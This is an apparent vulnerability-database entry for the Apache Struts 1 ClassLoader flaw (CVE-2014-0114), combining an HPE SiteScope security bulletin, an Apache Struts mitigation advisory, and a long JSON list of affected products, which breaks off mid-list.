7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2015-5652
8.6 CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
CVE-2016-0763
6.3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE has provided a resolution via an update to HPE SiteScope. Details on the update and each vulnerability are in the KM articles below.
Note: The resolution for each vulnerability listed is to upgrade to SiteScope 11.32IP2 or an even more recent version of SiteScope if available. The SiteScope update can be can found in the personal zone in "my updates" in HPE Software Support Online: https://softwaresupport.hpe.com.
-
Apache Commons FileUpload: KM02550251 (CVE-2014-0050):
-
Apache Struts: KM02553983 (CVE-2014-0114):
-
Apache Tomcat: KM02553990 (CVE-2016-0763):
-
Apache XML Xalan: KM02553991 (CVE-2014-0107):
-
Apache Groovy: KM02553992 (CVE-2015-3253):
-
Python: KM02553997 (CVE-2015-5652):
-
Spring Framework: KM02553998 (CVE-2013-6429):
HISTORY Version:1 (rev.1) - 4 November 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
Thanks to the efforts of Alvaro Munoz and the HP Fortify team, the Apache Struts project team can recommend a first mitigation that is relatively simple to apply. It involves the introduction of a generic Servlet filter, adding the possibility to blacklist unacceptable request parameters based on regular expressions. Please see the corresponding HP Fortify blog entry [2] for detailed instructions. Based on this information, the Apache Struts project team recommends to apply the mitigation advice immediately for all Struts 1 based applications.
Struts 1 has had its End-Of-Life announcement more than one year ago [3]. However, in a cross project effort the Struts team is looking for a correction or an improved mitigation path. Please stay tuned for further information regarding a solution.
This is a cross-list posting. If you have questions regarding this report, please direct them to security@struts.apache.org only.
[1] http://struts.apache.org/release/2.3.x/docs/s2-021.html [2] http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.U2J7xeaSxro [3] http://struts.apache.org/struts1eol-announcement.html
-- Ren\xe9 Gielen http://twitter.com/rgielen
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201404-0288", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "struts", "scope": "eq", "trust": 1.9, "vendor": "apache", "version": "1.2.4" }, { "model": "struts", "scope": "eq", "trust": 1.9, "vendor": "apache", "version": "1.2.7" }, { "model": "struts", "scope": "eq", "trust": 1.9, "vendor": "apache", "version": "1.2.6" }, { "model": "struts", "scope": "eq", "trust": 1.9, "vendor": "apache", "version": "1.3.10" }, { "model": "struts", "scope": "eq", "trust": 1.9, "vendor": "apache", "version": "1.2.2" }, { "model": "struts", "scope": "eq", "trust": 1.9, "vendor": "apache", "version": "1.1" }, { "model": "struts", "scope": "eq", "trust": 1.9, "vendor": "apache", "version": "1.3.5" }, { "model": "struts", "scope": "eq", "trust": 1.9, "vendor": "apache", "version": "1.2.8" }, { "model": "struts", "scope": "eq", "trust": 1.9, "vendor": "apache", "version": "1.3.8" }, { "model": "struts", "scope": "eq", "trust": 1.9, "vendor": "apache", "version": "1.2.9" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 1.8, "vendor": "hitachi", "version": "-09-00-00" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "-09-50-03" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "-09-50-00" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "-09-10-10" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "-09-00-12" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "-08-50-13" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "-08-50-00" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "-10-00-03" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "-10-00-00" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 1.5, "vendor": "hitachi", "version": "-09-10-00" }, { "model": "struts", "scope": "eq", "trust": 1.3, "vendor": "apache", "version": "1.0.2" }, { "model": "tiered storage manager software -00 )", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "7.1.1" }, { "model": "tiered storage manager software )", "scope": "eq", "trust": 1.2, "vendor": "hitachi", "version": "7.3-00" }, { "model": "commons beanutils", "scope": "lte", "trust": 1.0, "vendor": "apache", "version": "1.9.1" }, { "model": "struts", "scope": "eq", "trust": 1.0, "vendor": "apache", "version": "1.0" }, { "model": "device manager software -00 )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "7.3" }, { "model": "device manager software )", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "7.4-00" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "-08-11-00" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.9, "vendor": "hitachi", "version": "-08-00-00" }, { "model": "device manager software )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.1-00" }, { "model": "device manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.1.1-03" }, { "model": "device manager software )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.2-00" }, { "model": "tiered storage manager software )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.1-00" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.1.1-00" }, { "model": "device manager software )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.2-01" }, { "model": "device manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.2-01" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "-08-11-08" }, { "model": "device manager software )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.1.1-00" }, { "model": "device manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.2-00" }, { "model": "tiered storage manager software )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.1.1-00" }, { "model": "jp1/performance management manager web option", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "-07-00" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "-08-00-12" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.1-00" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.2-00" }, { "model": "device manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.1-03" }, { "model": "tiered storage manager software )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.1-01" }, { "model": "device manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.1-00" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "7.6.1-05" }, { "model": "device manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.1-02" }, { "model": "device manager software )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.1.1-04" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "9.1" }, { "model": "tiered storage manager software )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.1.1-01" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "7.4.0-02" }, { "model": "device manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.1.1-00" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "7.4.0-01" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "8.5" }, { "model": "device manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.0-06" }, { "model": "device manager software )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.2-02" }, { "model": "device manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.2-02" }, { "model": "device manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.0-00" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "8.0.0-03" }, { "model": "tiered storage manager software )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.2-00" }, { "model": "tiered storage manager software )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.2-01" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.2-01" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "8.0.0-04" }, { "model": "device manager software )", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.1-02" }, { "model": "device manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.1.1-04" }, { "model": "device manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "7.0.0-00" }, { "model": "jp1/performance management manager web option", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "-07-54" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "8.1" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "8.7" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.1-01" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "-08-10-08" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "6.1.1-01" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.6, "vendor": "hitachi", "version": "-08-10-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.17" }, { "model": "openpages", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "device manager software (linux(suse", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-05" }, { "model": "retail allocation", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.0" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.1" }, { "model": "distributed marketing", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "utilities framework", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.0.3.0" }, { "model": "device manager software (solaris(sp", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.4.0-07" }, { "model": "global link manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.6-00" }, { "model": "security qradar", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tivoli storage manager administration center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "tivoli workload scheduler z/os connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "records manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "retail clearance optimization engine", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.4" }, { "model": "retail back office", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.0" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.401" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0.0-00" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "social media analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-00" }, { "model": "terasoluna server framework for java", "scope": "ne", "trust": 0.3, "vendor": "ntt data", "version": "2.0.5.2" }, { "model": "global link manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.2-00" }, { "model": "device manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0.1-02" }, { "model": "big-ip webaccelerator hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "lotus expeditor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "15.1" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "device manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0.0-00" }, { "model": "device manager software (solaris(x6", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-05" }, { "model": "device manager software (solaris", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0-06(x64))" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "3.5.0" }, { "model": "device manager software (linux(suse", "scope": "ne", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-06" }, { "model": "fuse esb enterprise", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7.1.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.43" }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-05" }, { "model": "connections", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "retail invoice matching", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.0" }, { "model": "knowledge", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.6.0" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-05" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.13" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "tiered storage manager software (linux(suse", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-00" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "retail returns management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.4" }, { "model": "content analytics with enterprise search", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0" }, { "model": "xp p9000 tiered storage manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.1.0-00" }, { "model": "retail back office", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.47" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "connections", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "tivoli dynamic workload console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.0" }, { "model": "retail back office", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "14.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux enterprise software development kit sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "utilities framework", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4.3.0.1.0" }, { "model": "big-ip edge gateway hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "secure analytics 2013.2r8", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "job management partner 1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-0" }, { "model": "device manager software (linux(sles", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.0.0-00" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.41" }, { "model": "content manager records enabler", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "device manager software )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0-06" }, { "model": "tivoli integrated portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.19" }, { "model": "openpages grc platform", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "content navigator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "device manager software )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.3-00" }, { "model": "primavera contract management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "14.0" }, { "model": "tuning manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-00" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "openpages", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.x" }, { "model": "device manager software (solaris", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.1.1-04(x64))" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "retail back office", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.43" }, { "model": "device manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-05" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.0" }, { "model": "weblogic server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.1.10" }, { "model": "jboss operations network", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "3.2.1" }, { "model": "primavera p6 enterprise project portfolio management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.3" }, { "model": "device manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0.0-00" }, { "model": "content navigator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "device manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-05" }, { "model": "xp7 global link manager software", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.4.0-00" }, { "model": "raplication manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-05" }, { "model": "xp p9000 tiered storage manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0.0-00" }, { "model": "websphere partner gateway advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "weblogic portal", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "10.0.1.0" }, { "model": "retail back office", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.42" }, { "model": "connections", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "global link manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.5-00" }, { "model": "tiered storage manager software", "scope": "ne", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-06" }, { "model": "device manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.5.0-02" }, { "model": "big-ip webaccelerator hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "sitescope", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "11.20" }, { "model": "primavera contract management", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.1" }, { "model": "xp p9000 tiered storage manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0.0-06" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "tiered storage manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0.0-00" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.2-01" }, { "model": "jp1/performance management web console", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-10-07" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.27" }, { "model": "tiered storage manager software (solaris(sp", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.0.0-00" }, { "model": "device manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-05" }, { "model": "knowledge", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.5.1.7" }, { "model": "websphere lombardi edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "lotus expeditor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "device manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-05" }, { "model": "device manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.4.0-07" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1" }, { "model": "tuning manager software (linux(suse", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-00" }, { "model": "websphere sensor events", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "openpages", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1.5" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.1.0" }, { "model": "security threat response manager", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.1" }, { "model": "retail central office", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.2" }, { "model": "xp p9000 replication manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0-00" }, { "model": "connections", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.10" }, { "model": "tuning manager software", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.2.1-00" }, { "model": "qradar siem mr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "tivoli dynamic workload console", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "websphere service registry and repository", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "filenet p8 platform content search engine", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "tivoli identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "tivoli netcool/omnibus web gui", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.35" }, { "model": "tuning manager software (solaris(x6", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.6.1-05" }, { "model": "tivoli composite application manager for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "tiered storage manager software (linux(rhel", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "6.4.0-08" }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "raplication manager software (linux(suse", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "8.0.0-00" }, { "model": "tuning manager software )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "7.001" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "qradar siem mr5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "communications webrtc session controller", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.3" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.07" }, { "model": "infosphere identity insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere 